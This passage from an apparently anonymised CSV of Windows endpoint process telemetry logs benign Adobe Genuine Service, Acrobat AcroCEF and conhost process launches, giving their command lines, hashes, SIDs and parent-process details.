00:43:12.882084500+00:00,645af268-52b7-420f-8300-1175798631e7,computerpii_0a470890c60768167990033d701e7bd881398861,181507,False,10.7740.19041.1052,False,11540474045136989,,11540474045178323,2021-06-10 00:46:11.806850600+00:00,4476,2021-06-10 00:46:11.806850600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,4476,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.831368700+00:00,2018-05-11 03:50:54+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service
+1225,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:28.551016400+00:00,6456,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:41:28.524825100+00:00,9044,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_xdjlfm 3",False,2021-06-10 00:46:11.806850600+00:00,4476,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:28.784304900+00:00,2021-06-25 00:43:12.882177800+00:00,55deb51a-fae9-4cbd-bd4a-4ff79202e4cf,computerpii_0a470890c60768167990033d701e7bd881398861,181511,False,10.7740.19041.1052,False,11540474045178323,,11540474045178324,2021-06-25 00:41:28.524825100+00:00,9044,2021-06-25 00:41:28.524825100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,9044,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:41:28.530746200+00:00,2018-05-11 03:50:54+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1226,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:29.029500200+00:00,19740,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_ihiqum 3",PortableExecutable,2018-05-11 03:50:54+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,3548360,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.806850600+00:00,4476,AGSService.exe,"""AGSService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:29.177782100+00:00,2021-06-25 00:43:12.882407300+00:00,a854c10d-796d-4cc5-af70-0900190b096f,computerpii_0a470890c60768167990033d701e7bd881398861,181516,False,10.7740.19041.1052,False,11540474045136989,,11540474045178327,2021-06-10 00:46:11.806850600+00:00,4476,2021-06-10 00:46:11.806850600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,4476,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.831368700+00:00,2018-05-11 03:50:54+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service
+1227,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:29.043882200+00:00,6104,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,25b4d7fa7572f6cf494f8576a982915a,ddbcb718150a085e96d2b73d4e5f5aaa04cf701e1d05007cd4875756a462b0dc,1c8d3a710eaa76276c4357601f52acc1bb662d9e,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:41:29.029500200+00:00,19740,AGSService.exe,"""AGSService.exe"" \\.\pipe\gc_pipe_ihiqum 3",False,2021-06-10 00:46:11.806850600+00:00,4476,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:29.183823800+00:00,2021-06-25 00:43:12.882453100+00:00,6c81393c-d825-4b7f-b796-caee6ecb03f3,computerpii_0a470890c60768167990033d701e7bd881398861,181517,False,10.7740.19041.1052,False,11540474045178327,,11540474045178328,2021-06-25 00:41:29.029500200+00:00,19740,2021-06-25 00:41:29.029500200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe,19740,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3548360,2021-02-17 03:27:16+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:41:28.530746200+00:00,2018-05-11 03:50:54+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Integrity Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Integrity Service,AGSService.exe,Adobe Genuine Software Integrity Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1228,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:30.709542900+00:00,1680,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a12292"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a12292""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,323272,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:30.754637800+00:00,2021-06-25 00:43:12.883612500+00:00,1f9b1486-b428-4be3-9686-ff281ca1da3b,computerpii_0a470890c60768167990033d701e7bd881398861,181542,False,10.7740.19041.1052,False,11540474045136991,,11540474045178347,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,AGMService.exe,4496,2304,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility
+1229,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:30.723440600+00:00,17840,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:41:30.709542900+00:00,1680,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a12292"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a12292""",False,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:30.755752300+00:00,2021-06-25 00:43:12.883660600+00:00,b4999d56-e90b-451c-a067-9e90e13bf0af,computerpii_0a470890c60768167990033d701e7bd881398861,181543,False,10.7740.19041.1052,False,11540474045178347,,11540474045178349,2021-06-25 00:41:30.709542900+00:00,1680,2021-06-25 00:41:30.709542900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,1680,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:41:30.726772800+00:00,2020-09-22 19:30:00+00:00,2304,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1230,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:30.789925100+00:00,15832,AdobeGCClient.exe,"""AdobeGCClient.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a12292"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a12292""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AdobeGCClient.exe,6743752,99b696fe03a14bd322f39fc35827e487,b57aab0a87e6c85ddf061a0a10bc10b96c61ae827fbb61f514a1df9fffcf263f,43d2475f42eeacb434b632975a33ebc8979a95b3,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:41:30.709542900+00:00,1680,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a12292"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a12292""",False,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:30.926345+00:00,2021-06-25 00:43:12.883706100+00:00,ce81e2ff-f608-48d7-8ae1-b967449ead2a,computerpii_0a470890c60768167990033d701e7bd881398861,181544,False,10.7740.19041.1052,False,11540474045178347,,11540474045178350,2021-06-25 00:41:30.709542900+00:00,1680,2021-06-25 00:41:30.709542900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,1680,16512,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-25 00:41:30.726772800+00:00,2020-09-22 19:30:00+00:00,2304,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClient,AdobeGCClient.exe,Adobe GC Client Application
+1231,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:32.551075700+00:00,14356,AcroCEF.exe,"""AcroCEF.exe"" --type=renderer --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --touch-events=enabled --field-trial-handle=1872,5721004115284958596,15409303017527892298,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=40047250808018465 --renderer-client-id=2 --mojo-platform-channel-handle=1912 --allow-no-sandbox-job /prefetch:1",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:41:32.403448200+00:00,13388,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-25 00:41:29.156715600+00:00,17944,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:32.586811100+00:00,2021-06-25 00:43:12.883936100+00:00,ce5c63df-5627-4483-87ef-b3e2c97ad4dd,computerpii_0a470890c60768167990033d701e7bd881398861,181549,False,10.7740.19041.1052,False,11540474045178354,,11540474045178355,2021-06-25 00:41:32.403448200+00:00,13388,2021-06-25 00:41:32.403448200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,13388,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-25 00:41:32.410110800+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1232,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:32.558428400+00:00,12732,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1872,5721004115284958596,15409303017527892298,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=2577167775853338265 --mojo-platform-channel-handle=1924 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:41:32.403448200+00:00,13388,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-25 00:41:29.156715600+00:00,17944,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:41:32.587137500+00:00,2021-06-25 00:43:12.883981500+00:00,11ca079a-f00b-4a35-b6c4-f321ce6ecc5f,computerpii_0a470890c60768167990033d701e7bd881398861,181550,False,10.7740.19041.1052,False,11540474045178354,,11540474045178356,2021-06-25 00:41:32.403448200+00:00,13388,2021-06-25 00:41:32.403448200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,13388,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-25 00:41:32.410110800+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,,,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+1233,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:41:32.636948700+00:00,17452,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1872,5721004115284958596,15409303017527892298,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=14285421704434293112 --mojo-platform-channel-handle=2248 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat 